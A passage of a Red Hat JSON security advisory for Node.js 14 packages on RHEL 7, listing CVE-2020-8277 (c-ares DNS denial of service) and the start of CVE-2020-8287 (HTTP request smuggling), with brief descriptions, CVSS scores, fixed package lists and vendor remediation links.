"7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs: use-after-free in the TLS implementation" }, { "cve": "CVE-2020-8277", "cwe": { "id": "CWE-119", "name": "Improper Restriction of Operations within the Bounds of a Memory Buffer" }, "discovery_date": "2020-11-16T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1898554" } ], "notes": [ { "category": "description", "text": "A Node.js application that allows an attacker to trigger a DNS request for a host of their choice could trigger a Denial of Service in versions \u003c 15.2.1, \u003c 14.15.1, and \u003c 12.19.1 by getting the application to resolve a DNS record with a larger number of responses. This is fixed in 15.2.1, 14.15.1, and 12.19.1.", "title": "Vulnerability description" }, { "category": "summary", "text": "c-ares: ares_parse_{a,aaaa}_reply() insufficient naddrttls validation DoS", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-8277" }, { "category": "external", "summary": "RHBZ#1898554", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1898554" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-8277", "url": "https://www.cve.org/CVERecord?id=CVE-2020-8277" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-8277", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8277" } ], "release_date": "2020-11-12T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-04T17:20:51+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0421" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "c-ares: ares_parse_{a,aaaa}_reply() insufficient naddrttls validation DoS" }, { "cve": "CVE-2020-8287", "cwe": { "id": "CWE-444", "name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)" }, "discovery_date": "2021-01-05T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1912863" } ], "notes": [ { "category": "description", "text": "A flaw was found in nodejs. Affected versions of Node.js allow two copies of a header field in an HTTP request. The first header field is recognized while the second is ignored leading to HTTP request smuggling. The highest threat from this vulnerability is to data confidentiality and integrity.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs: HTTP request smuggling via two copies of a header field in an http request", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", 